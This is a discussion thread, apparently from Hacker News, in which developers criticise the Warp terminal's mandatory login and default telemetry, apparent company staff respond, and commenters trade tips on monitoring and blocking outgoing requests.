I’d imagine that deliberate discussion backed by respect for your users and team know-how should have resulted in a different set of choices.


Is login and authentication really necessary? No internet -> no terminal?

Even VScode a massive Microsoft project does not require signup/authentication to use it...

Love the design, but seems like a very enterprise-driven and niche product for a lot of developers


> Warp is a blazingly fast, rust-based terminal reimagined from the ground up to work like a modern app.

Well, at least they didn't lie.

As of my personal position: I want less products in my computing environments, not more. I hope more people would ponder on possible ramifications of going in the opposite direction.


I'm not sure I care very much about which piece of software is a "product" or not (I have no qualms with devs asking for money), but I definitely agree that calling a piece of software "modern" actually carries negative connotations nowadays. I think most would agree that apps developed within the last 4 years are often more resource-intensive and slower than the equivalents from 15+ years ago.

Warp looks really cool as a tool and I intend to try it as soon as it's available on Linux, but it was pretty bold of them to include outgoing network requests by default before presenting directly to HN. I saw the post about "everything is opt in, where 'everything' means 'sending terminal contents'" - as if people read privacy policies before trying out a new dev tool.


We exists, but it's complicated. A complete solution has more edge cases than what "stacks" have tools to work with. My gut feeling is that the contemporary approach to solving information problems is crazy nonsense. I'm working on something to prove myself wrong. If I'm not I'll make something available for a fee


Yeah. From a developer standpoint my terminal is the one sacred thing i have still. Im unfortunately not using something that is going to randomly break or make external calls every time I open it.

Looks cool but I will never even give this a try.


I nearly also used the word “sacred” in my comment above.

I gave up MacOS for Linux because I felt like Apple wasn’t letting me operate my own computer anymore. Even Ubuntu has eroded the transparency and control I have over my computer over the last decade, at least that’s my perception.

I feel like the only part of my computer that I understand anymore is what happens in the terminal.

I don’t categorically hate having magic happen on some remote server that makes computing easier for me in some way… but I really need to have a space that I understand and control and — over time — that place has slowly been compressed into the command line.


> Wanted to give it a shot but got disappointed when I launched it and the following happened

Yup, well, that's what happens when you take money from VCs or other third party investors, you need to monetise / demonstrate ROI / need numbers for your investor slide-decks.

I'll stick to my old-fashioned spyware free terminal thanks very much. Why overcomplicate things that don't need to be complicated.


Yep. In my last project one of the key USPs was privacy. The product vision was built around it and it was fundamental to our positioning in the market.

But I made the mistake of letting investors share executive control of the company, and pop there goes the pro-privacy policy.

In defence of founders everywhere, however, I will say that the investors didn’t just say “no”. They strung me along for almost a year, insisting we would be meeting about it, recording decisions where we apparently agreed, even pointing out those decisions while they flagrantly violated them in practice.

So who knows what’s happened here. A lot of the messaging sounds like what happened to me. “Yes we know privacy is important and in the future mumble mumble.”


Yea, I would never use a terminal that does any of that. If you want logging and crash reports, use Breakpad or something similar to send the crash report after a crash. No need to have telemetry reports going all the time.


In addition to crashes, we also want to know things like: which features people are using so we can invest more in them, how much people are using the app so we know if we're doing in a good job.

Totally understand if you're not comfortable with that though! It will be removed when Warp is out of the beta test.


I know it sounds logical to you, but the further down that road you go the worse your software will be in the end. Make software with a coherent vision and you can pick and choose features based on how will they fit that vision without needing to spy on your users, or turn it into a popularity contest.

Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.


> Incidentally, you might be interested to know that in the last 8 hours my comment has gotten 25 upvotes; that’s a lot of lost customers.

No, that's a lot of people who upvoted your comment.

I'd wager anyone who agrees with your perspective is unlikely to have been a Warp customer in the first place.

(Speaking as one who tends towards your side of this discussion.)


I don’t mean that my comment cost them customers, only that the upvotes on my comment measures the customers they had already lost by using pervasive telemetry.


I doubt that even a plurality of the people who upvoted you would have installed Warp and wound up paying for it.


I hate telemetry driven development.

It just results in loosing infrequently used but important features. First it gets moved from a button to a menu, then to a sub-menu and eventually removed.


Exactly. I prefer Emacs-style programs where the number of features grows without end, and everyone customizes the UI and keybindings to make the features they like best easiest to use. Every time someone thinks of a new way that Emacs can make their life easier they can add it to Emacs immediately, without asking for permission or even sending in a pull request. Later, if they think the feature is polished enough and others might find it useful, they can send a pull request either to Emacs or to the Emacs Lisp Package Archive (ELPA), or to MELPA (should they not like the minor licensing restrictions on ELPA), or just post it on EmacsWiki or their blog or Facebook page or whatever for others to copy from.

But for that to work you have to start with something that is both very extensible, and yet is also coherently designed. The extensibility has to be a strong part of that initial design, so that the software is designed to be malleable.


I can't use it either (mostly because it's Mac only, and also because of the sign-in requirement), but at least they are transparent about it:

https://docs.warp.dev/getting-started/getting-started-with-w...

https://docs.warp.dev/getting-started/privacy


That privacy policy is sketchy. It starts with this-

> Our general philosophy is complete transparency and control of any data leaving your machine. This means that in general any data sharing is opt-in and under the control of the user, and you should be able to remove or export that data from our servers at any time.

They then go on, further down the page, to say that this first paragraph is a complete lie-

> However, for our beta phase, we do send telemetry by default and we do associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong.


Is that even legal? Or can you just write whatever you want into a privacy policy?


It’s a policy - a set of rules. It’s only a problem if you say something and don’t do it. But even then, enforcement is most likely to come from interested parties like payment providers, who generally couldn’t care less as long as it’s not their data that’s compromised.


That is the modern experience part.


I knew this was too good to be true :(

I feel bad for the engineers who worked on this, as this is really awesome but probably will not find market fit


Wait, you _have_ to have a github account to even open this terminal?

Yikes.


I remember an iOS email client many years ago that required a Dropbox login for some reason. It made no sense that an email client would require me to log in to a cloud file storage/syncing service - in my mind these two things are completely unrelated. That email client ended up disappearing.

I expect that a terminal program which requires a login to a completely unrelated service will end up meeting the same fate as that email client did.


> an iOS email client many years ago that required a Dropbox login for some reason.

IIRC, that was Mailbox. Dropbox bought them a month after launch and then, sadly, killed it off two years later. [1]

[1]: https://www.theverge.com/2015/12/8/9873268/why-dropbox-mailb...


Yes, I believe that's the one. Thanks!

I couldn't remember it, but with a generic name like Mailbox that's not a surprise.


> I really wanted to like it, too. The screenshots look great

Agreed! Let's just wait for a FOSS alternative to pop up that has a few similar fundamental features. Don't need the cloud-multi-user-account-based stuff.


To be honest, for a terminal, not being open-source is enough for me. I'm not Stallman, but a terminal, seriously…


1) installed it 2) login required 3) uninstalled it

try again


Just curious, what tools do you prefer to use to identify network requests from recently installed applications such as this?


I can't imagine using a Mac without Little Snitch: https://obdev.at/products/littlesnitch

Among other things, it is disturbing how chatty a lot of things are. (Did you know Apple Mail keeps track of which account you email different people with and wants to send that to configuration.apple.com, even if you have carefully disabled everything iCloud related?)

There's a similar tool for Linux, but I usually keep a networkless VM around for playing with potentially sketchy things.


Closed source, monitors everything on the machine.

How much do you trust little snitch?

And then asking to keep a copy of your drivers license for ten years is a complete non starter. (Yes, that's in their privacy policy)


There is a section about being required by the EU to determine location for VAT collection purposes. If their payment processor can’t determine your location sufficiently, then they have to collect data identifying your location and store it for tax/proof purposes. That’s something they don’t want to ever have to do, obviously.

Here’s a link to the policy: https://www.obdev.at/privacy/index.html


On Linux there is OpenSnitch. A bit rough around the edges, but does what it needs to do well.


Thank you.


On the mac there's Little Snitch.


Any Windows equivalent?



I also would like to know this.


Also, sorry if this is harsh, but speaking my mind: why is it important to mention what the underlying programming language is?

It seems like misdirection and sleazy marketing. Products built with Rust are particularly susceptible to it.


This. I was excited to try it but I cannot use this on my work computer at all.


It’s a closed source paid spyware development tool that you rely on every day to get work done, what’s not to love about this idea?


Yep, I'd gladly pay money for a piece of software this important to my workflow, but no telemetry, no login, and no other such stuff, even in opt-in/opt-out fashion.


I just downloaded it, but then thankfully read this comment before running it. No way do I want my terminal sending stuff to Google.


Exactly the same, clicked "comments" as I was downloading it, saw the first comment, deleted the installer.

I'd be supportive of "report issue" buttons (I'd use them, yes), and of occasional prompts along the lines of "Hey, you've used this app for a week/two/month, may we send some telemetry? We need it to better understand how the app is used. Here's the data, is it OK to upload it?" As long as I don't see anything sensitive in the payload, it sure is okay: you respect me and I respect you (with bonus points for politely asking), and I'll be sure to reach out if I see anything sensitive.

Phoning home from the get-go for anything but an anonymous update check and requiring some account is a hard "no".


I definitely understand the concerns. For our public beta, we do send telemetry and associate it with the logged in user because it makes it much easier to reach out and get feedback when something goes wrong. But we only track metadata, never console output. For an exhaustive list of events that we track, see here: https://docs.warp.dev/getting-started/privacy#exhaustive-tel.... Once we hit general availability, our plan is to make telemetry completely opt-in and anonymous.


Wow, this is just unbelievable. You don't say anywhere on your privacy page that you are associating this data with specific users.

Everything your company says regarding privacy seems to be a complete lie. You contradict yourselves everywhere. As a security officer, I would never allow any company whose security I run to use your product; even if you fix these issues now, who knows if you're going to lie again in the future.

Trust is hard to regain once lost, and your company definitely blew it here.


Maybe don't put this lie in the middle of the homepage?

> Private & Secure

> All cloud features are opt-in. Data is encrypted at rest.


Encryption at rest is fun until the keys are leaked.


Or prefix it with a "Final product will be ..."


This looks very interesting to me, but some of this telemetry is a deal breaker. On your privacy page, it says "Our general philosophy is complete transparency and control of any data leaving your machine." If I have complete control of any data leaving my machine, can I opt to turn off the telemetry entirely?


Of course not. How else will they be able to make you the product without their trojan rabbit sending back all kinds of telemetry goodness?


> we only track metadata, never console output

It would be meaningful to indicate whether you track console input as well.


That's an important callout! By console output, we really mean output from the pseudoterminal, which includes command input and output printed to the terminal.

We don't store any content of _any_ part of a command that's executed in Warp.


... and never will?


Why even ask?

Founders don't really have much control over what the tools they create wind up being used for.

Assume that some people will use any tool you encounter for the worst thing it can possibly do.

If the tool has significant potential to do things that bother you, don't use it.


Why do you say "wind up being used for" as if it is an act of god rather than a business decision?


Because I'm talking about founders and how much control they have over the tools they bring into being.

Acts of God are a better model for that than business decisions.

Some users will abuse the snot out of it, and a small start up may not even realize that's happening for months.

The founder may not retain the authority to control decisions about what changes to make to the tools or how to monetize them.

Hackers may break into the servers and use the tool for their own ends.

And, yes, often enough the founder themselves will throw the users under the bus when push comes to shove.


From their link, it seems they don’t. Agree that positive confirmation would be good for the beta.

> We do not store any data from the command input or output itself as part of our telemetry.


This is correct. We do not send or store any terminal contents (input or outputs) to our server.

The only case in which that is not true is if a user elects to use Warp to share the output of a command using our Block Sharing feature.


With the rest of your responses I'm left looking for weasel words in here.


You should do that now and just ask on startup.

Honestly, opting users in by default is, at least in my opinion, not acceptable.

People who would say no to that popup would not appreciate you randomly reaching out to them anyway.


That's a ton of data being collected. I would much rather have this submitted during a crash than on an opt-in/opt-out basis. I'd not want to use a terminal whose data collection crosses the internet every time I use it.


Totally understand if you don't feel comfortable using it!

The reason we don't submit this only during a crash is that there are a lot of other things we want to know about users, like: Which features are they using? Are they sticking to Warp as their daily driver? How much time do they spend in the app?

We do want to make the telemetry opt-in after Warp is out of beta.


There are better ways to gather feedback, even if your application is in beta. Most loyal customers will let you know what’s wrong and which features they’re most excited about; that honest feedback is far superior to telemetry data. You can even add a survey form after the application exits to try to maximize the feedback loop.

Totally understand you’re a new venture backed business, however, you most likely are targeting the wrong group of users by automatically sending data over the internet for “no reason”.


> Most loyal customers will let you know what’s wrong and what features they’re most excited about- that honest feedback is far superior than telemetry data

That's just wrong. Very few users, regardless of loyalty, would bother sending feedback. That's why many companies run drives with gift cards or whatever as a reward for participating in giving feedback. And even then, you'd get a limited subset of users (loyal, loud, with time available to waste) instead of everyone, as with telemetry.


How are you checking if they stick to warp as daily driver? Are you checking for other shells open?


We are seeing if people are using Warp regularly.

We don’t know about any shells outside of Warp, so technically they could also be using other terminals - but that’s enough info for our product development.

We never track the contents of commands. A full telemetry table is included in our user docs.


I definitely will not try it if the analytics part are not optional, though I am glad to see you're documenting exactly what gets sent. I might consider trying it and even opt-in to the analytics once you make it optional.


At least for EU users, you cannot collect information like this without the explicit consent of those users.

It's 2022 FFS, and still companies are over-stepping the mark - companies behaving like yours are exactly the reason GDPR and ePrivacy etc exist in the first place :/


well, they gotta pay back those $17M to investors !


Yup, that's an immediate deal-breaker for me. Shame because this looks really interesting :/


Yes, but it's written in Rust.


> I really wanted to like it, too. The screenshots look great

My thoughts exactly. I don't use potential keyloggers on my browser (think grammarly or similar), I'm not going to install a terminal making requests or getting my data as I use it.


They have a "layman's terms" section where it states that, for now, in beta, telemetry is going to be on regardless: https://www.warp.dev/privacy

They promise that after beta you won't need Github, and telemetry will be optional.

Though imo this is just as easy to read and understand: https://assets-global.website-files.com/60352b1db5736ada4741...


How do you check which requests it's making? Do you just use tcpdump or something?


You could use a layer 7 firewall for this purpose. I use Little Snitch on macOS and OpenSnitch on Linux. Given this application is macOS only right now, I would bet OP used Little Snitch, since it's popular on macOS.


Thank you. I'm dual-booting macOS and Linux right now, so those will both come in handy.


Just FYI, Sentry is an error capturing and reporting tool, not "telemetry". It could potentially be abused to collect "telemetry", but there are far better tools for that, so it'd make little sense IMHO. I've used it extensively for error management at a previous job and it worked very well, correlating with env, release, etc. (it was the self-hosted version, but still). Not affiliated in any way, just a happy "customer" (never paid, so not really a customer).


As a user of Sentry, you're technically also aware of how difficult it is to keep user information out of those errors and stack traces. Paths alone are enough to start leaking information about you and your system that just shouldn't leak from your terminal to the internet.


yeah, hard pass

edit: no Windows or Linux support???


There's no reason for a terminal emulator to connect to the internet or collect telemetry opt-in or not. None whatsoever.


UI looks great to me too. Thanks for the comment, I'll skip on downloading this though because of the outgoing requests


Not touching it with a 10-foot pole.


What is your tool of choice for intercepting outgoing requests like this?


That’s concerning - I am also wondering if iTerm sends this data too…


yeah I just block all of those domains in my dns reverse proxy now, idgaf
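For anyone wanting to do the same, here's a minimal sketch of what DNS-level blocking can look like with dnsmasq. The file path and domains below are placeholders, not the actual hostnames Warp uses; substitute whatever their telemetry docs list:

```
# /etc/dnsmasq.d/block-telemetry.conf  (hypothetical file name)
# Answer 0.0.0.0 for these zones so clients on the network can't reach them.
# address=/<zone>/<ip> matches the domain and all of its subdomains.
address=/telemetry.example.com/0.0.0.0
address=/sentry.example.com/0.0.0.0
```

Note this only blocks traffic that goes through your DNS resolver; an app that hardcodes IP addresses or uses DNS-over-HTTPS would bypass it, which is where a per-app firewall like Little Snitch or OpenSnitch is more reliable.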


Thank you!


lol


Come on. You must realize VS Code and basically every website you use collects telemetry data, which is rarely for anything nefarious except product improvements. If GitHub/Microsoft had released this product, would you be raising the same concerns?


We can set the bar higher than “other people do this too so it’s fine”.

> If GitHub/Microsoft had released this product, would you be raising the same concerns?

Yes. It’s one of the reasons I use the open source build instead.


Me too. VSCodium FTW https://vscodium.com/


Maybe not, but I'd trust Microsoft to have a decent security and privacy team working on this more than a startup. What if they're logging the wrong stuff and my data is leaked?


Good point - Microsoft products practically created the modern security industry. They're experts.


Did you mean that old-school Microsoft was so badly insecure that they created a massive opportunity for security professionals?


I did mean that, yes.


You mean like when Microsoft started uploading all handwriting & voice recognition inputs including passwords?

History has shown that telemetry is effectively spyware until proven otherwise, no matter who does it.


Yeah, but if Microsoft fucks up badly enough I can sue them; startups are less likely to survive a significant breach (especially if the thing being breached is 100% of their product). There's just far less risk.


I think you could've had a full stop before 'until proven otherwise'.


I use VS Codium for this reason and self-host Git, so yeah, for me that's definitely a thing. And I have a ton of stuff to block as much telemetry from other software and websites as I can, including on mobile.

It's not for everyone but yes there are still Don Quixotes like me fighting the army of windmills :)

I suspect the proportion of us here at HN is pretty high too.


A remote system by definition has access to the information you give it, and you should manage that carefully. Meanwhile, your filesystem has access to your entire life, heart, and mind: unvarnished, unedited, and unsegregated, with ephemera alongside the deep facts of your mind.

Microsoft is a criminal enterprise that relatively recently found god, to a degree, and actually started caring about their image at home while still facilitating crime and corruption abroad. The fact that many are stupid enough to trust them with their data does not imply that this is a reasonable choice.


> which is rarely for anything nefarious except product improvements

Up until now, you've had to make these design decisions on your own, relying only on perplexing intangibilities like 'taste' and 'intuition'.

